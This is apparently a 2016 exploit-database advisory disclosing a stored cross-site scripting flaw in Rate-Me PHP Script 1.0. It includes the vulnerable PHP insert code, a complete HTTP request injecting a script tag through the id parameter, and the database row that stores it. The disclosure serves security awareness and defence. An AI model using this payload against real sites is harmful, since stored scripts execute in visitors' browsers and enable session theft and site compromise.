Rate-Me PHP Script 1.0 Cross Site Scripting
Posted on 14 November 2016
# Exploit Title: Rate-Me PHP Script Persistent Cross Site Scripting # Disclosure Date: 11/11/2016 # Exploit Author: Boumediene KADDOUR a.k.a Sh311c0d3r # Version: 1.0 # Application website: https://www.phpjabbers.com/free-rate-me-script/ # CVE : N/A Vulnerability Details: ===================== Rate-me php script suffers from a stored Cross Site Scripting which, An attacker can inject JavaScript in the rate section and in particular through the id field, where the injected script will be stored on the database. If a developer creates a webpage where authenticated or non authenticated users can see the rate status, The script's triggered and the code's executed on the client side. [+] PoC Vulnerable Code: if ($_REQUEST["do"]=='rate') { $sql = "INSERT INTO ".$SETTINGS["data_table"]." SET date_time=now(), rate_id='".mysql_real_escape_string($_REQUEST["id"])."', rating='".mysql_real_escape_string($_REQUEST["rating"])."', ip_address='".mysql_real_escape_string(get_client_ip())."'"; $sql_result = mysql_query ($sql, $connection ) or die ('request "Could not execute SQL query" '.$sql); echo 'Thank you'; exit; } Payload: GET /Rate-Me/rate-me.php?do=rate&id=<script>alert("StoredXSS")</script>&rating=1&1478894713054 HTTP/1.1 Host: 192.168.43.237 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.43.237/Rate-Me/example-page.html Connection: keep-alive Database output: mysql> select * from rateme where id=19; +----+-------------------------------------------------+---------+-----------------------------------------+------------------------+ | id | rate_id | rating | date_time | ip_address | +---- +------------------------------------------------+---------+------------------------------------------+-----------------------+ | 19 | <script>alert("StoredXSS")</script> | 1 | 2016-11-11 15:05:30 | 192.168.43.237 | +----+-------------------------------------------------+---------+------------+----------------------------+------------------------+ 1 row in set (0.00 sec) sh311c0d3r
